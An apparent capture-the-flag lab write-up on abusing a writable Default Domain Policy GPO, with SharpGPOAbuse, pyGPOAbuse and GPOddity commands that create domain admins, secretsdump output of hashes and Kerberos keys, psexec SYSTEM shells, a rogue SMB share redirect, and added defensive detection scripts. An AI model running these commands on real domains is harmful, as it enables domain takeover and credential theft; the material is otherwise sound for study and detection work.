GPO Abuse


It has been identified and confirmed that the current user, anirudh, holds WriteDacl, WriteOwner and GenericWrite over the Default Domain Policy GPO. That policy is linked at the root of the target domain, VAULT.OFFSEC, so whatever is written into it is applied by every domain-joined computer, including the domain controller.

While there are many methods to approach this, I will be focusing on SharpGPOAbuse (run from the existing WinRM session on the target) and pyGPOAbuse (run remotely from Kali).

Local


*Evil-WinRM* PS C:\Users\anirudh\Documents> upload SharpGPOAbuse.exe
 
Info: Uploading /home/kali/PEN-200/PG_PRACTICE/vault/SharpGPOAbuse.exe to C:\Users\anirudh\Documents\SharpGPOAbuse.exe
Data: 107860 bytes of 107860 bytes copied
Info: Upload successful!

Leveraging the existing WinRM session to transfer SharpGPOAbuse.exe to the target.

*Evil-WinRM* PS C:\Users\anirudh\Documents> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName 'Default Domain Policy' --Domain VAULT.OFFSEC --DomainController dc.vault.offsec 
[+] Domain = vault.offsec
[+] Domain Controller = dc.vault.offsec
[+] Distinguished Name = CN=Policies,CN=System,DC=VAULT,DC=OFFSEC
[+] SID Value of anirudh = S-1-5-21-537427935-490066102-1511301751-1103
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\vault.offsec\SysVol\vault.offsec\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
 
*Evil-WinRM* PS C:\Users\anirudh\Documents> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.

Executing SharpGPOAbuse.exe with --AddLocalAdmin to modify the Default Domain Policy so that the anirudh user becomes a local administrator (the output above shows the change written to the policy's GptTmpl.inf on SYSVOL and the GPO version number bumped), then forcing a policy refresh with gpupdate.exe.

*Evil-WinRM* PS C:\Users\anirudh\Documents> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain
 
Members
 
-------------------------------------------------------------------------------
Administrator
anirudh
The command completed successfully.

The anirudh user is now a local administrator on the dc.vault.offsec host.
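From the defender's side, the artifact this leaves behind is a [Group Membership] entry in the policy's GptTmpl.inf (the file SharpGPOAbuse reports touching above). The following Python check is an added example, not part of the write-up or of SharpGPOAbuse: it parses that section and flags any principal the policy pushes into the local Administrators group that is not on an approved list. The two template bodies inside it are constructed, modelled on the output above and reusing the SID the tool printed.

```python
"""
Parse the [Group Membership] section of a GPO's GptTmpl.inf and report
principals the policy adds to local Administrators (S-1-5-32-544) that are
not approved.

Added example, not code from the write-up or from SharpGPOAbuse. The two
template bodies below are constructed; TAMPERED_GPTTMPL mimics the entry
--AddLocalAdmin writes, using the SID printed in the write-up.
"""
import codecs
import configparser
from pathlib import Path

LOCAL_ADMINISTRATORS_SID = "S-1-5-32-544"

# Constructed sample: a template with no Restricted Groups section.
CLEAN_GPTTMPL = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
"""

# Constructed sample: the same template after a member has been injected.
TAMPERED_GPTTMPL = CLEAN_GPTTMPL + """[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = *S-1-5-21-537427935-490066102-1511301751-1103
"""


def read_gpttmpl(path: Path) -> str:
    """GptTmpl.inf on SYSVOL is normally UTF-16 with a BOM; fall back to UTF-8."""
    raw = path.read_bytes()
    if raw.startswith(codecs.BOM_UTF16_LE) or raw.startswith(codecs.BOM_UTF16_BE):
        return raw.decode("utf-16")
    return raw.decode("utf-8-sig")


def parse_group_membership(text: str) -> dict[str, dict[str, list[str]]]:
    """Return {group: {"Members": [...], "Memberof": [...]}} from the
    [Group Membership] section, or {} when the template has no such section.
    Keys look like '*<SID>__Members'; values are comma-separated principals,
    each prefixed with '*' when given as a SID."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.optionxform = str  # keep SID case exactly as written
    cp.read_string(text)
    groups: dict[str, dict[str, list[str]]] = {}
    if not cp.has_section("Group Membership"):
        return groups
    for key, value in cp.items("Group Membership"):
        group, _, relation = key.partition("__")
        entry = groups.setdefault(group.lstrip("*"), {"Members": [], "Memberof": []})
        entry.setdefault(relation, []).extend(
            m.strip().lstrip("*") for m in value.split(",") if m.strip()
        )
    return groups


def find_unexpected_admins(text: str, approved: set[str]) -> list[str]:
    """Principals this template adds to local Administrators that are not approved."""
    members = parse_group_membership(text).get(LOCAL_ADMINISTRATORS_SID, {}).get("Members", [])
    return [m for m in members if m not in approved]


if __name__ == "__main__":
    # Real use: read_gpttmpl(Path(r"\\<domain>\SysVol\<domain>\Policies\{<GUID>}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf"))
    for label, body in (("clean", CLEAN_GPTTMPL), ("tampered", TAMPERED_GPTTMPL)):
        hits = find_unexpected_admins(body, approved=set())
        print(f"{label}: {'ok' if not hits else 'ALERT, unexpected local admins: ' + ', '.join(hits)}")
```

A non-empty result on the Default Domain Policy, together with the GPT.ini/versionNumber bump shown in the tool output, is exactly the state a SYSVOL change-audit job should alert on; the approved set would normally hold the SIDs of groups an organisation deliberately pushes via Restricted Groups.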

Hashdump


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ KRB5CCNAME=anirudh@dc.vault.offsec.ccache impacket-secretsdump VAULT.OFFSEC/anirudh@dc.vault.offsec -k -no-pass -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xe9a15188a6ad2d20d26fe2bc984b369e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:608339ddc8f434ac21945e026887dc36:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
VAULT\DC$:plain_password_hex:7690b2a19f4946f27f3e523bdb001acbc508c2b6bcd40ceff07faf4bbc8a62df2c617b8b41e11f8878a0bdffa48d24e49faafedafc4f31597953086636d3ad7be965e646407f2caf560d5a15cc5d42638bf5a9b78d0f8967a0bdefc3781e70f4f70e9b194237e248214f66257516638b1a26ded1d217244e6f211a68d8ad55d93b4e9711e12507b6572663549bff8ddae2e28983d779d89e8bdc1cd95dc0feec10113659fcc46a076e719c592c53bab94138a9e05d5ef78a99d0faa2fafbc7abbcf19918e20c8a87f7cf4e562e5b195b78ae47b9c24919c59a0d6851e045c040840204e162cb6584822692d49bcd4de4
VAULT\DC$:aad3b435b51404eeaad3b435b51404ee:b2990741874b51a9a02969b0312a529d:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x3df657e4617398e4ab73e41c6183f8ac3d608523
dpapi_userkey:0xc69b79bdce1e77b22043bbb5bd336c39d3965012
[*] NL$KM 
 0000   4A E2 C6 53 5D 77 02 C9  AE A9 48 23 7C 5B 46 39   J..S]w....H#|[F9
 0010   4A 56 02 3B CC 38 B8 C0  92 DD 41 2C 72 F2 63 46   JV.;.8....A,r.cF
 0020   71 36 1B E3 D2 BA E7 AC  8C BD E9 D5 55 36 C0 07   q6..........U6..
 0030   99 5A 11 4A 24 E4 42 E3  4C 12 3F F5 1B D7 D5 8C   .Z.J$.B.L.?.....
NL$KM:4ae2c6535d7702c9aea948237c5b46394a56023bcc38b8c092dd412c72f2634671361be3d2bae7ac8cbde9d55536c007995a114a24e442e34c123ff51bd7d58c
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:54ff9c380cf1a80c23467ff51919146e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c660d4355b25d08a42130cb43d93418c:::
anirudh:1103:aad3b435b51404eeaad3b435b51404ee:74c8075e8506407ebe49bb8de63f6057:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:b2990741874b51a9a02969b0312a529d:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:bf23151dcf4df4d3f6dfd1839f84f67efdb34d4aeb1e8e21aeeed468e02d6204
Administrator:aes128-cts-hmac-sha1-96:f627c58051156eda8beb5d911976d7f7
Administrator:des-cbc-md5:f2d03b9b896eb073
krbtgt:aes256-cts-hmac-sha1-96:1ece11d3d9fa652ff3b5f6cd519869df5b9782f66671225edec3f7937b5af67b
krbtgt:aes128-cts-hmac-sha1-96:28e72f2babc6eaa4926d94bdeb7c4a0f
krbtgt:des-cbc-md5:371fa46843c2f7f8
anirudh:aes256-cts-hmac-sha1-96:de888f9a54f817c010f7162c137e6904b1a1e1a2315fde294125e3c0294e7137
anirudh:aes128-cts-hmac-sha1-96:b29b9cb12534b8914b8b2caf060295ef
anirudh:des-cbc-md5:eaf885b33e1fdf9e
DC$:aes256-cts-hmac-sha1-96:a00f46455447bd6af9131e2050f4712463c43e3d4941d04c64b187647f63d50b
DC$:aes128-cts-hmac-sha1-96:4b8fccb5011f74dccfc798c6ca64961a
DC$:des-cbc-md5:7a5b58c7b008459d
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain Level Compromise

Shell Drop


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ KRB5CCNAME=anirudh@dc.vault.offsec.ccache impacket-psexec VAULT.OFFSEC/anirudh@dc.vault.offsec -k -no-pass -dc-ip $IP       
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Requesting shares on dc.vault.offsec.....
[*] Found writable share ADMIN$
[*] Uploading file GctQpfbI.exe
[*] Opening SVCManager on dc.vault.offsec.....
[*] Creating service lfov on dc.vault.offsec.....
[*] Starting service lfov.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
DC
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.106.172
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.106.254

System level compromise

Remote


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ impacket-pyGPOAbuse 'VAULT.OFFSEC/anirudh:SecureHM' -dc-ip $IP -gpo-id '31B2F340-016D-11D2-945F-00C04FB984F9' -command 'net user adm1n Qwer1234 /ADD /DOMAIN && net group "Domain Admins" /ADD adm1n' -v -f
INFO:root:Version updated
[*] Version updated
SUCCESS:root:ScheduledTask TASK_bd4f73d0 created!
[+] ScheduledTask TASK_bd4f73d0 created!

Using pyGPOAbuse against the same GPO (referenced by its GUID), I can create an immediate scheduled task that creates an arbitrary domain user, adm1n, and adds it to Domain Admins.

*Evil-WinRM* PS C:\Users\anirudh\Documents> gpupdate /Force
Updating policy...
 
Computer Policy update has completed successfully.
User Policy update has completed successfully.

Then, using the existing WinRM session, I can force a policy refresh with gpupdate, or simply wait for the next automatic refresh cycle.

*Evil-WinRM* PS C:\Users\anirudh\Documents> net user adm1n
User name                    adm1n
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never
 
Password last set            5/2/2025 10:26:26 AM
Password expires             6/13/2025 10:26:26 AM
Password changeable          5/3/2025 10:26:26 AM
Password required            Yes
User may change password     Yes
 
Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never
 
Logon hours allowed          All
 
Local Group Memberships
Global Group memberships     *Domain Admins        *Domain Users
The command completed successfully.

The DA user, adm1n, has been successfully created.
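The pyGPOAbuse run leaves a different artifact than the local-admin change: an ImmediateTaskV2 element in the GPO's Machine\Preferences\ScheduledTasks\ScheduledTasks.xml on SYSVOL. The Python below is an added example (not from the write-up or from pyGPOAbuse) that parses that file, lists every task with the account it runs as and its command line, and flags immediate tasks or tasks whose command line performs account or group management. The XML it parses is constructed to resemble such a task, reusing the task name and command from the run above.

```python
"""
List and flag scheduled tasks in a GPO's Group Policy Preferences file
(Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml).

Added example, not code from the write-up or from pyGPOAbuse. The XML below
is constructed: one ordinary task plus one immediate task that mirrors the
task name and command shown in the write-up.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

IMMEDIATE_TAGS = {"ImmediateTaskV2", "ImmediateTask"}
SUSPICIOUS_TOKENS = ("net user", "net group", "net localgroup", "powershell", "-enc")

SAMPLE_SCHEDULED_TASKS_XML = """<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <TaskV2 clsid="{D8896631-B747-47a7-84A6-C155337F3BC8}" name="Weekly Cleanup" image="0" changed="2025-04-01 09:00:00" uid="{11111111-1111-1111-1111-111111111111}">
    <Properties action="U" name="Weekly Cleanup" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>C:\\Scripts\\cleanup.cmd</Command>
            <Arguments></Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </TaskV2>
  <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="TASK_bd4f73d0" image="0" changed="2025-05-02 10:26:00" uid="{22222222-2222-2222-2222-222222222222}">
    <Properties action="C" name="TASK_bd4f73d0" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>cmd.exe</Command>
            <Arguments>/c net user adm1n Qwer1234 /ADD /DOMAIN &amp;&amp; net group "Domain Admins" /ADD adm1n</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>
"""


@dataclass
class TaskFinding:
    name: str
    kind: str        # element tag, e.g. TaskV2 or ImmediateTaskV2
    changed: str     # GPP 'changed' timestamp, useful for timelining
    run_as: str
    command: str
    arguments: str
    immediate: bool


def parse_scheduled_tasks(xml_text: str) -> list[TaskFinding]:
    """One TaskFinding per task element directly under <ScheduledTasks>."""
    root = ET.fromstring(xml_text)
    findings: list[TaskFinding] = []
    for task in root:
        props = task.find("Properties")
        if props is None:
            continue
        exec_el = props.find("./Task/Actions/Exec")
        command = exec_el.findtext("Command", default="") if exec_el is not None else ""
        arguments = exec_el.findtext("Arguments", default="") if exec_el is not None else ""
        findings.append(TaskFinding(
            name=task.get("name", ""),
            kind=task.tag,
            changed=task.get("changed", ""),
            run_as=props.get("runAs", ""),
            command=command,
            arguments=arguments,
            immediate=task.tag in IMMEDIATE_TAGS,
        ))
    return findings


def suspicious_tasks(xml_text: str) -> list[TaskFinding]:
    """Immediate tasks, plus any task whose command line does account/group management."""
    flagged = []
    for f in parse_scheduled_tasks(xml_text):
        cmdline = f"{f.command} {f.arguments}".lower()
        if f.immediate or any(tok in cmdline for tok in SUSPICIOUS_TOKENS):
            flagged.append(f)
    return flagged


if __name__ == "__main__":
    for f in suspicious_tasks(SAMPLE_SCHEDULED_TASKS_XML):
        print(f"ALERT {f.kind} '{f.name}' changed {f.changed} runs as {f.run_as}: {f.command} {f.arguments}")
```

Immediate tasks are legitimate but rare in most environments, and an immediate task running as SYSTEM in the Default Domain Policy is a strong signal on its own; the changed timestamp lines up with the GPO version bump and the user's "Password last set" time shown above when reconstructing what happened.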

Hashdump


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ impacket-secretsdump VAULT.OFFSEC/adm1n@dc.vault.offsec -k -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Qwer1234
[-] CCache file is not found. Skipping...
[*] Target system bootKey: 0xe9a15188a6ad2d20d26fe2bc984b369e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:608339ddc8f434ac21945e026887dc36:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
VAULT\DC$:plain_password_hex:4f3690463a50e4366088dbd47d0ddda5abdfc6aee784cb6409e6fe66adcf8b1cc40a4e9afbfbb064334929c37b6f8b0d5181bcc33d4495b70a0acc77fc0f4a65aa8c8f508a676e55531200f529f35cff7b4ddcd45723177d1f3a66e4b1a463169a7a9404f9f3698dcf4ec8da9d56ecc286aa91d38268f69c28e44ca493b51ab36fc948cbe9a0addd40fb766f5d3676fd19b2a2db8c02a31bfd13bb4052114c147dd35f9cc222f1e6d31b7bfe0299841b3f151a2806ff55c4f9f57e0d55826f3bf8d8825a8851a15a979108970204ae417bf3146c2daffb137e14da006726c3eb670e737aecb764fac9895c290cbc2206
VAULT\DC$:aad3b435b51404eeaad3b435b51404ee:b85549c425f29cdf17afa47dcbf9ca36:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x3df657e4617398e4ab73e41c6183f8ac3d608523
dpapi_userkey:0xc69b79bdce1e77b22043bbb5bd336c39d3965012
[*] NL$KM 
 0000   4A E2 C6 53 5D 77 02 C9  AE A9 48 23 7C 5B 46 39   J..S]w....H#|[F9
 0010   4A 56 02 3B CC 38 B8 C0  92 DD 41 2C 72 F2 63 46   JV.;.8....A,r.cF
 0020   71 36 1B E3 D2 BA E7 AC  8C BD E9 D5 55 36 C0 07   q6..........U6..
 0030   99 5A 11 4A 24 E4 42 E3  4C 12 3F F5 1B D7 D5 8C   .Z.J$.B.L.?.....
NL$KM:4ae2c6535d7702c9aea948237c5b46394a56023bcc38b8c092dd412c72f2634671361be3d2bae7ac8cbde9d55536c007995a114a24e442e34c123ff51bd7d58c
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] CCache file is not found. Skipping...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:54ff9c380cf1a80c23467ff51919146e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c660d4355b25d08a42130cb43d93418c:::
anirudh:1103:aad3b435b51404eeaad3b435b51404ee:74c8075e8506407ebe49bb8de63f6057:::
adm1n:5101:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:b85549c425f29cdf17afa47dcbf9ca36:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:bf23151dcf4df4d3f6dfd1839f84f67efdb34d4aeb1e8e21aeeed468e02d6204
Administrator:aes128-cts-hmac-sha1-96:f627c58051156eda8beb5d911976d7f7
Administrator:des-cbc-md5:f2d03b9b896eb073
krbtgt:aes256-cts-hmac-sha1-96:1ece11d3d9fa652ff3b5f6cd519869df5b9782f66671225edec3f7937b5af67b
krbtgt:aes128-cts-hmac-sha1-96:28e72f2babc6eaa4926d94bdeb7c4a0f
krbtgt:des-cbc-md5:371fa46843c2f7f8
anirudh:aes256-cts-hmac-sha1-96:de888f9a54f817c010f7162c137e6904b1a1e1a2315fde294125e3c0294e7137
anirudh:aes128-cts-hmac-sha1-96:b29b9cb12534b8914b8b2caf060295ef
anirudh:des-cbc-md5:eaf885b33e1fdf9e
adm1n:aes256-cts-hmac-sha1-96:49477df729d447d45c9a441cea0643c1709a92575402612c7c48dd85df26bd87
adm1n:aes128-cts-hmac-sha1-96:97f2df3be32836899a6ef03b7fc1e452
adm1n:des-cbc-md5:619b04fd52b0d0e3
DC$:aes256-cts-hmac-sha1-96:5da9a8cd09369fe34e1b4b50b569e9ce895e51a664fb2b9feb3cd124539dc2f9
DC$:aes128-cts-hmac-sha1-96:1a4f56a4db48823284b38d3195650610
DC$:des-cbc-md5:73b5a87fb30e159d
[*] Cleaning up... 

Domain Level Compromise

Shell Drop


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ impacket-psexec VAULT.OFFSEC/adm1n@dc.vault.offsec -k -dc-ip $IP    
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Qwer1234
[-] CCache file is not found. Skipping...
[*] Requesting shares on dc.vault.offsec.....
[*] Found writable share ADMIN$
[*] Uploading file fYBKGeIJ.exe
[*] Opening SVCManager on dc.vault.offsec.....
[*] Creating service XsEG on dc.vault.offsec.....
[*] Starting service XsEG.....
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
[!] Press help for extra shell commands
[-] CCache file is not found. Skipping...
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
DC
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.106.172
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.106.254

System level compromise

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ gpoddity --domain VAULT.OFFSEC --username anirudh --password SecureHM --gpo-id 31B2F340-016D-11D2-945F-00C04FB984F9 --dc-ip $IP --command 'net user adm1n2 Qwer1234 /ADD /DOMAIN && net group "Domain Admins" /ADD adm1n2' --rogue-smbserver-ip $tun0 --rogue-smbserver-share smb --verbose       
 
=== GENERATING MALICIOUS GROUP POLICY TEMPLATE ===
 
[*] Downloading the legitimate GPT from SYSVOL
[+] Successfully downloaded legitimate GPO from SYSVOL to 'GPT_out' folder
[*] Injecting malicious scheduled task into initialized GPT
[+] Successfully injected malicious scheduled task
[*] Initiating LDAP connection
[+] LDAP bind successful
[*] Updating downloaded GPO version number to ensure automatic GPO application
[+] Successfully updated downloaded GPO version number
 
=== SPOOFING GROUP POLICY TEMPLATE LOCATION THROUGH gPCFileSysPath ===
 
[*] The save file for current exploit run is cleaning/31B2F340-016D-11D2-945F-00C04FB984F9/2025_05_02-20_14_59.txt
[*] Modifying the gPCFileSysPath attribute of the GPC to '\\192.168.45.204\smb'
[+] Successfully spoofed GPC gPCFileSysPath attribute
[*] Updating the versionNumber attribute of the GPC
[+] Successfully updated GPC versionNumber attribute
[*] Updating the extensionName attribute of the GPC
[+] Successfully updated GPC extensionName attribute
 
=== LAUNCHING GPODDITY SMB SERVER AND WAITING FOR GPO REQUESTS ===
 
If the attack is successful, you will see authentication logs of machines retrieving and executing the malicious GPO
Type CTRL+C when you're done. This will trigger cleaning actions
 
Config file parsed
Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
Config file parsed
Config file parsed
Config file parsed
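GPOddity works differently from the two tools above: instead of writing into SYSVOL it rewrites the GPO's gPCFileSysPath attribute in LDAP so that clients fetch the Group Policy Template from the attacker's SMB share (\\192.168.45.204\smb in the run above) and then bumps versionNumber. That leaves the Group Policy Container pointing somewhere other than the domain's own SYSVOL folder for that GUID, which is straightforward to check. The Python below is an added example, not part of the write-up or of GPOddity; the GPO attribute values in it are constructed (the healthy one mirrors the SYSVOL path SharpGPOAbuse printed, the spoofed one mirrors the path GPOddity wrote), and fetching the real attributes from LDAP is left to the caller.

```python
"""
Sanity-check a GPO's gPCFileSysPath and version numbers.

Added example, not code from the write-up or from GPOddity. The GpoContainer
values below are constructed from the paths shown in the write-up; retrieving
the live attributes from the domain (LDAP) is left to the caller.
"""
import re
from dataclasses import dataclass
from typing import Iterable, Optional

# \\host\share\rest...
UNC_RE = re.compile(r"^\\\\(?P<host>[^\\]+)\\(?P<share>[^\\]+)(?P<rest>(?:\\[^\\]*)*)$")

DEFAULT_DOMAIN_POLICY = "{31B2F340-016D-11D2-945F-00C04FB984F9}"


@dataclass
class GpoContainer:
    cn: str                                  # GPO GUID as stored in the cn attribute
    gpc_file_sys_path: str                   # gPCFileSysPath
    version_number: int                      # versionNumber in AD
    gpt_ini_version: Optional[int] = None    # Version= from GPT.ini on SYSVOL, if fetched


def split_version(version: int) -> tuple[int, int]:
    """versionNumber packs user version (high 16 bits) and machine version (low 16 bits)."""
    return (version >> 16) & 0xFFFF, version & 0xFFFF


def audit_gpc(gpo: GpoContainer, domain: str, dc_hosts: Iterable[str] = ()) -> list[str]:
    """Return a list of findings; empty means the container looks healthy.
    Trusted template hosts are the domain DNS name plus any DC names supplied."""
    findings: list[str] = []
    m = UNC_RE.match(gpo.gpc_file_sys_path)
    if not m:
        return [f"gPCFileSysPath is not a UNC path: {gpo.gpc_file_sys_path!r}"]
    host = m.group("host").lower()
    share = m.group("share").lower()
    rest = m.group("rest").lower()
    trusted_hosts = {domain.lower()} | {h.lower() for h in dc_hosts}
    if host not in trusted_hosts:
        findings.append(f"template served from untrusted host {host!r} (expected {domain})")
    if share != "sysvol":
        findings.append(f"template share is {share!r}, not SysVol")
    expected_tail = f"\\{domain.lower()}\\policies\\{gpo.cn.lower()}"
    if rest != expected_tail:
        findings.append(f"template path {rest!r} does not match the GPO's own folder {expected_tail!r}")
    if gpo.gpt_ini_version is not None and gpo.gpt_ini_version != gpo.version_number:
        findings.append(f"AD versionNumber {gpo.version_number} != GPT.ini Version {gpo.gpt_ini_version}")
    return findings


# Constructed sample: the Default Domain Policy in its normal state.
HEALTHY = GpoContainer(
    cn=DEFAULT_DOMAIN_POLICY,
    gpc_file_sys_path=r"\\vault.offsec\SysVol\vault.offsec\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}",
    version_number=65545,
    gpt_ini_version=65545,
)

# Constructed sample: the same GPO after its template location was redirected
# to a rogue share and the AD version bumped without touching SYSVOL.
SPOOFED = GpoContainer(
    cn=DEFAULT_DOMAIN_POLICY,
    gpc_file_sys_path=r"\\192.168.45.204\smb",
    version_number=65546,
    gpt_ini_version=65545,
)


if __name__ == "__main__":
    for label, gpo in (("healthy", HEALTHY), ("spoofed", SPOOFED)):
        user_v, machine_v = split_version(gpo.version_number)
        print(f"{label}: user={user_v} machine={machine_v}")
        for finding in audit_gpc(gpo, "vault.offsec", dc_hosts=["dc.vault.offsec"]):
            print(f"  ALERT {finding}")
```

Run on a schedule over every GPO in the domain, the path check catches the redirection itself and the version comparison catches a container that was bumped in AD without a matching SYSVOL change; the gPCFileSysPath and versionNumber writes are also visible as directory-service object modification events on the DC if that auditing is enabled.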